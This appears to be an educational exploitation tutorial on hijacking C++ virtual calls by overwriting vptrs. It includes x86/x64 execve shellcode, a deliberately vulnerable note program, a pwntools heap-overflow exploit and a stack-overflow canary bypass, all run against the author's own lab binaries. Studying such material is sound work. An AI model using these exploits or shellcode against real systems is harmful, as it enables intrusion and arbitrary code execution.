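Attacking C++ virtual functions

C++ virtual functions

I remembered the term "virtual function" but had completely forgotten what it is for, so it is time to go back and look at C++ again.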

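Put simply, a virtual function lets a call made through a base-class pointer run the derived class's implementation. The mechanism is roughly as shown in the figure below:

[Figure: a virtual function call going through the vptr and the vtable]

As the figure shows, every object of a class with virtual functions stores a pointer to the virtual function table (the vptr) at the "head" of its memory. A virtual call first follows the vptr to the vtable, then loads the matching function pointer from the table and calls it. Because the vptr sits in front of the member variables, overflowing an object's own members cannot reach its own vptr. To control a vptr through an overflow, one object (v1) has to overflow into the "head" of another object (v2).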

With this process in mind, it is easier to follow along with code. Consider the following:

// file: test.cpp
// compile: g++ -g -m32 -o test test.cpp
#include <iostream>
using namespace std;

class test
{
public:
    void set(int m, int n){
        a = m;
        b = n;
    }
    virtual void show1(){
        cout << "virtual function1\n";
    }
    virtual void show2(){
        cout << "virtual function2\n";
    }
private:
    int a,b;
};

int main()
{
    test *t1, *t2;
    t1 = new test();
    t2 = new test();
    t1 -> show1();
    t1 -> set(1,2);
    t1 -> show2();
    cout << "-----------------------------\n";
    t2 -> show1();
    t2 -> set(3,4);
    t2 -> show2();
    return 0;
}

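The logic is simple. Class test has three member functions and two private member variables. set assigns the private members, while show1 and show2 are declared virtual. main declares two pointers of type test, instantiates an object for each, and then calls all three functions on both.

Let's first look at the compiled program in IDA. Decompiled pseudocode for C++ is not as readable as it is for C, but this program is simple enough to read the assembly directly, which also gives a more precise picture of the whole flow: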

.text:0804868B                 lea     ecx, [esp+4]
.text:0804868F                 and     esp, 0FFFFFFF0h
.text:08048692                 push    dword ptr [ecx-4]
.text:08048695                 push    ebp
.text:08048696                 mov     ebp, esp
.text:08048698                 push    ebx
.text:08048699                 push    ecx
.text:0804869A                 sub     esp, 10h
.text:0804869D                 sub     esp, 0Ch
.text:080486A0                 push    0Ch             ; unsigned int
.text:080486A2                 call    __Znwj          ; operator new(uint)
.text:080486A7                 add     esp, 10h
.text:080486AA                 mov     ebx, eax
.text:080486AC                 mov     dword ptr [ebx], 0
.text:080486B2                 mov     dword ptr [ebx+4], 0
.text:080486B9                 mov     dword ptr [ebx+8], 0
.text:080486C0                 sub     esp, 0Ch
.text:080486C3                 push    ebx             ; this
.text:080486C4                 call    _ZN4testC2Ev    ; test::test(void)
.text:080486C9                 add     esp, 10h
.text:080486CC                 mov     [ebp+t1], ebx
.text:080486CF                 sub     esp, 0Ch
.text:080486D2                 push    0Ch             ; unsigned int
.text:080486D4                 call    __Znwj          ; operator new(uint)
.text:080486D9                 add     esp, 10h
.text:080486DC                 mov     ebx, eax
.text:080486DE                 mov     dword ptr [ebx], 0
.text:080486E4                 mov     dword ptr [ebx+4], 0
.text:080486EB                 mov     dword ptr [ebx+8], 0
.text:080486F2                 sub     esp, 0Ch
.text:080486F5                 push    ebx             ; this
.text:080486F6                 call    _ZN4testC2Ev    ; test::test(void)

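The assembly is a bit long-winded, but it shows the basic mechanics of a C++ class in detail. This first part is simply object instantiation: operator new allocates 0xC bytes (the vptr plus the two int members), the memory is zeroed, and the constructor is called, as IDA's comments make clear. Let's focus on the constructor: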

.text:08048848 ; void __cdecl test::test(test *const this)
.text:08048848                 public _ZN4testC2Ev ; weak
.text:08048848 _ZN4testC2Ev    proc near               ; CODE XREF: main+39↑p
.text:08048848                                         ; main+6B↑p
.text:08048848
.text:08048848 this            = dword ptr  8
.text:08048848
.text:08048848 ; __unwind {
.text:08048848                 push    ebp             ; Alternative name is 'test::test(void)'
.text:08048849                 mov     ebp, esp
.text:0804884B                 mov     edx, offset off_8048930  ; vtable address (becomes the vptr)
.text:08048850                 mov     eax, [ebp+this]
.text:08048853                 mov     [eax], edx
.text:08048855                 nop
.text:08048856                 pop     ebp
.text:08048857                 retn

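There is really only one operation here: the vtable address is stored at the location this points to, that is, into the vptr slot at the start of the object. This is easy to see when debugging. Next, the virtual function call: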

.text:080486C0                 sub     esp, 0Ch
.text:080486C3                 push    ebx             ; this
.text:080486C4                 call    _ZN4testC2Ev    ; test::test(void)
.text:080486C9                 add     esp, 10h
.text:080486CC                 mov     [ebp+t1], ebx
......
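.text:08048701                 mov     eax, [ebp+t1]    ; load t1, the object pointer (this)
.text:08048704                 mov     eax, [eax]   ; load the vptr, i.e. the vtable address
.text:08048706                 mov     eax, [eax]   ; load the first vtable entry, the pointer to show1
.text:08048708                 sub     esp, 0Ch
.text:0804870B                 push    [ebp+t1] ; C++ member functions take a hidden argument: the this pointer
.text:0804870E                 call    eax  ; call the virtual function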

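After the constructor returns, ebx still holds the object's address, which is stored into the local variable t1. The virtual call then loads t1 from the stack, reads the vptr from the start of the object, fetches the function pointer from the vtable, and calls it.

The later call to show2 is nearly identical: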

.text:08048725                 mov     eax, [ebp+t1]
.text:08048728                 mov     eax, [eax]
.text:0804872A                 add     eax, 4   ; advance to the second vtable entry
.text:0804872D                 mov     eax, [eax]
.text:0804872F                 sub     esp, 0Ch
.text:08048732                 push    [ebp+t1]
.text:08048735                 call    eax

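The only difference is that after loading the vtable address it selects the second entry (add eax, 4), which is the function pointer for show2.

t2 goes through the same steps as t1, so we skip it here. Now look at the non-virtual member function set: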

.text:08048716                 push    2               ; n
.text:08048718                 push    1               ; m
.text:0804871A                 push    [ebp+t1]        ; this
.text:0804871D                 call    _ZN4test3setEii ; test::set(int,int)

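This is an ordinary direct call, and it also shows the hidden argument of member functions: the this pointer.

With the static analysis of the main logic done, let's use a debugger to check some of the details. Break at line 28, after the objects have been initialized:

[Figure: debugger view after the objects are constructed]

Continue running so that the private member variables get assigned:

[Figure: debugger view after the private members are assigned]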

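Hijacking control flow through an overflow

From the analysis above we know:

Virtual functions are called through the vtable
An object is stored in one contiguous block of memory

So in theory we could hijack control flow by modifying the contents of the vtable. Unfortunately, the memory that holds the vtable is not writable:

[Figure: memory map showing the vtable region without write permission]

The objects themselves, however, live on the heap, which is writable, so we can overwrite the vptr instead. Because the vptr is stored before the member variables, an overflow cannot overwrite the object's own vptr. But an overflow writes toward higher addresses and heap objects can sit right after one another, so overflowing a member of object 1 can modify the data of object 2 and complete the attack. Before doing that, let's modify the vptr explicitly in code to verify the idea. Consider the following code: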

/**
 *  file: V_table.cpp
 *  g++ -z execstack -o Vtable V_table.cpp
 *
 *  The general idea is as follows:
 *      1. append a fake vtable, which holds the shellcode's address, to the end of the shellcode
 *      2. make the object's vptr point to the fake vtable
 *      3. call the virtual function to execute the shellcode
 *
 *  Before starting, I tried to rewrite the vtable directly in code, but soon found that we have no permission to do so:
 *  the vtable is located in a read-only section, so it can be read but not written. This should be kept in mind.
 *
 *  The idea of this code comes from the book "0day Security: Software Vulnerability Analysis Technology".
 *  The original author's code works under Windows; here it is modified to run on Linux.
 *
 *  The code executed successfully on Ubuntu 16.04 LTS.
**/

#include <iostream>
#include <cstring>
using namespace std;

char shellcode[]="\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05\x00\x00\x00\x48\x12\x60\x00";
/**
 *  xor rdi, rdi
 *  push rdi
 *  push rdi
 *  pop rsi
 *  pop rdx
 *  mov rdi, 68732F6E69622F2Fh
 *  shr rdi, 8
 *  push rdi
 *  push rsp
 *  pop rdi
 *  push 3Bh
 *  pop rax
 *  syscall
**/


// define a class which contains virtual functions
class Failwest
{
public:
    char buf[200];
    virtual void test(void)
    {
        cout<<"This is a virtual function!"<<endl;
    }
};
Failwest overflow, *p;

int main(void)
{
    char * p_vtable;
    p_vtable=overflow.buf-8; // points to the object's vptr, stored just before buf (8-byte pointer on x86-64)
    // p_vtable = overflow
    // redirect the vptr to the fake vtable at 0x00601268
    p_vtable[0]=0x68;
    p_vtable[1]=0x12;
    p_vtable[2]=0x60;
    p_vtable[3]=0x00;
    memcpy(overflow.buf,shellcode,0x24); // copy the shellcode together with the fake vtable entry at its end
    // 0x00601268 is located right at the end of the shellcode:
    // in other words, we fake a vtable at the end of the shellcode that contains a single function pointer,
    // and that pointer points to the shellcode
    p=&overflow;
    // call the virtual function to trigger the shellcode
    p->test();
    return 0;
}

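The code is simple. The idea is to modify the vptr explicitly through a pointer so that it points to a fake vtable (here the fake vtable is placed at the end of the shellcode):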

p_vtable[0]=0x68;
p_vtable[1]=0x12;
p_vtable[2]=0x60;
p_vtable[3]=0x00;

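The shellcode is then copied into the memory of the object overflow, and the virtual function is called. The last four bytes of shellcode (\x48\x12\x60\x00) form the single entry of the fake vtable and point back to the start of the shellcode; both hard-coded addresses are specific to the author's build. Since the vptr has been modified, the program actually jumps to the shellcode: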

[Figure: the program spawning a shell after the virtual call]

So attacking by modifying the vptr directly is feasible. Next, an example that uses an overflow:

// file: note.cpp
// compile: g++ -m32 -o note note.cpp
#include <iostream>
#include <cstring>
#include <stdlib.h>
using namespace std;


void menu()
{
    cout << "1. add\n";
    cout << "2. show details\n";
    cout << "3. edit details\n";
    cout << "4. exit\n";
    cout << "Choice>>";
}

void backdoor()
{
    system("/bin/sh");
}

class note
{
public:
    void show();    // show details
    virtual void msg(); // descriptions
    void edit(char *, int, int);    // edit details
private:
    int index;
    char details[20];
};

void note::show()
{
    cout << "index: " << index <<endl;
    cout << "details: " << details <<endl;
}
void note::msg()
{
    cout << "work done.\n";
}
void note::edit(char * buf, int n, int len)
{
    index = n;
    memcpy(details, buf, len);
}

int main()
{
    note *n[10];
    int t(0), max(10), index, len, op;
    char buf[0x20];
    while(1){
        menu();
        if(t < 10){
            cin >> op;
            switch(op){
                case 1:
                    n[t++] = new note();
                    n[t-1] -> msg();
                    break;
                case 2:
                    cout << "gitf: "<< n[0] << endl;
                    cout << "index: ";
                    cin >> index;
                    n[index]->show();
                    break;
                case 3:
                    cout << "index: ";
                    (cin >> index).get();
                    cout << "len: ";
                    (cin >> len).get();
                    cout << "details: ";
                    cin.getline(buf,0x20);
                    n[index]->edit(buf, index, len);
                    n[index]->msg();
                    break;
                default:
                    exit(0);
            }
        }else{
            cout << "too much!!!\n";
            break;
        }
    }
}

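This code has quite a few problems of its own, but it is only used here to discuss overwriting a vptr through an overflow, so the other issues are ignored for now.

The logic needs little explanation; it resembles a typical CTF pwn challenge. The overflow is in edit: the private character array details is 20 bytes long, but the copy length is supplied by the user, so memcpy can write past the end of the array. The program also leaks a heap address (the address of n[0]), so we can create two objects, overflow from object 1 to overwrite object 2's vptr, and then trigger a virtual call on object 2 to complete the attack. The payload places the address of backdoor inside object 1's details as a fake vtable, rewrites the size field (0x21) of the next heap chunk with its original value, and sets object 2's vptr to addr+0xc, which is where that fake entry lives. The exploit is as follows: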

from pwn import *
context.update(arch='i386', os='linux', log_level='DEBUG')

p = process('./note')

backdoor = 0x080489ce

# add twice
p.recvuntil('>>')
p.sendline('1')
p.recvuntil('>>')
p.sendline('1')

# leak the address
p.recvuntil('>>')
p.sendline('2')
p.recvuntil('gitf: ')
addr = int(p.recvuntil('\n',drop=True),16)
log.success('addr = %#x', addr)
p.recvuntil('index')
p.sendline('0')


p.recvuntil('>>')
p.sendline('3')
# overflow to overwrite object 2's vptr
payload = p32(0) + p32(backdoor) + p32(0)*3 + p32(0x21) + p32(addr+0xc)

p.recvuntil('index')
p.sendline('0')
p.recvuntil('len')
p.sendline(str(len(payload)))
p.recvuntil('details')
# pause()

p.sendline(payload)
# pause()

# call the virtual function to trigger the fake vtable entry
p.recvuntil('>>')
p.sendline('3')
# pause()
p.recvuntil('index')
p.sendline('1')
p.recvuntil('len')
p.sendline('4')
p.recvuntil('details')
# pause()
p.sendline('aaaa')  # trash data

# get shell
p.interactive()

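Bypassing the canary with virtual functions

The analysis above shows that an overflow can overwrite a vptr and hijack control flow. What it leaves out is a property of 32-bit programs: arguments are passed on the stack, so every member function call pushes the this pointer as an argument. When the object is itself a local variable, its vptr (the first word that this points to) also lives on the stack, in the caller's frame above the callee's locals. An overflow of a local buffer in the callee can therefore run upward and overwrite it. The canary is only checked when the function returns, so a virtual call made before the return uses the corrupted vptr first. Even with the canary enabled, we can hijack control flow before the check happens, which bypasses the canary.

Consider the following code: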

/**
 *  file: pass-canary.cpp
 *  g++ -m32 -z execstack -o pass-canary pass-canary.cpp
 *
 *  The general idea is as follows:
 *      1. overflow on the stack and overwrite *this (the vptr of the object whose address is passed to func) so that it points to a fake vtable
 *      2. make the first entry of the fake vtable point to our shellcode
 *      3. call the virtual function to execute the shellcode
 *  notice: the fake vtable is placed at the head of the shellcode, so *this on the stack only needs to be overwritten with the shellcode's address
 *
 *  The idea of this code comes from the book "0day Security: Software Vulnerability Analysis Technology".
 *  The original author's code works under Windows; here it is modified to run on Linux.
 *
 *  The code executed successfully on Ubuntu 16.04 LTS.
**/

#include <cstring>

// shellcode's addr: 0x804a040
char shellcode[]="\x44\xa0\x04\x08"
    "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
    /**
    * xor ecx, ecx
    * mul ecx
    * mov al, 0Bh
    * push ecx
    * push 68732F2Fh
    * push 6E69622Fh
    * mov ebx, esp
    * int 80h
    **/
    // padding
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x40\xa0\x04\x08"; // overwrites the vptr so that it points to the head of shellcode


class Virtual {
public :
    void func(char * src)
    {
        char buf[100];
        strcpy(buf, src);
        bar(); // virtual function call
    }
    virtual void  bar()
    {
        // empty; exists only so that the class has a virtual function
    }
};

int main()
{
    Virtual test;
    test.func(shellcode);
    return 0;
}

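A few notes on the code:

Class Virtual has two member functions: func contains an obvious stack overflow, and bar is declared virtual
main calls func, and func then calls bar

First a brief look in IDA. Before calling func, main pushes the this pointer, which is the address of the object test in main's own stack frame, as an argument: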

.text:08048599                 push    offset shellcode ; char *
.text:0804859E                 lea     eax, [ebp+var_10]
.text:080485A1                 push    eax             ; this: the address of the object on main's stack, not the vptr stored in it
.text:080485A2                 call    _ZN7Virtual4funcEPc ; Virtual::func(char *)

At the start of func, the this argument pushed by the caller is copied into a local slot near the top of func's stack frame:

.text:080485C8                 push    ebp
.text:080485C9                 mov     ebp, esp
.text:080485CB                 sub     esp, 88h
.text:080485D1                 mov     eax, [ebp+this]  ; copy the this argument
.text:080485D4                 mov     [ebp+var_7C], eax

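Later, when the virtual function is called, this saved copy is used to reach the object. From there it is the same sequence analyzed at the start of the article: load the vptr, load the function pointer, and make the call:

.text:080485FA                 mov     eax, [ebp+var_7C]    ; load the saved this pointer
.text:080485FD                 mov     eax, [eax]   ; load the vptr, i.e. the vtable address
.text:080485FF                 mov     eax, [eax]   ; load the virtual function pointer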
.text:08048601                 sub     esp, 0Ch
.text:08048604                 push    [ebp+var_7C]
.text:08048607                 call    eax

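Note that the this argument pushed on the stack is itself a stack address, because the object is a local variable of main. The word stored at that address is the object's vptr, and that is the value the overflow has to reach. This is clearer in the debugging session below.

So the vptr we want to corrupt is on the stack, and what remains is to overwrite it through the overflow. Break at the call to func:

[Figure: debugger view at the call to func]

Then step into func:

[Figure: debugger view inside func]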

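Debugging confirms that overwriting the vptr through a stack overflow is feasible, so all that is left is to compute the offset and overwrite the pointer so that the shellcode runs. With everything in place, recompile and run the program: a shell opens successfully (the shellcode in this program simply spawns a shell).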

nop@ubuntu:~/Desktop$ ./pass-canary
$ whoami
nop
$ exit
nop@ubuntu:~/Desktop$
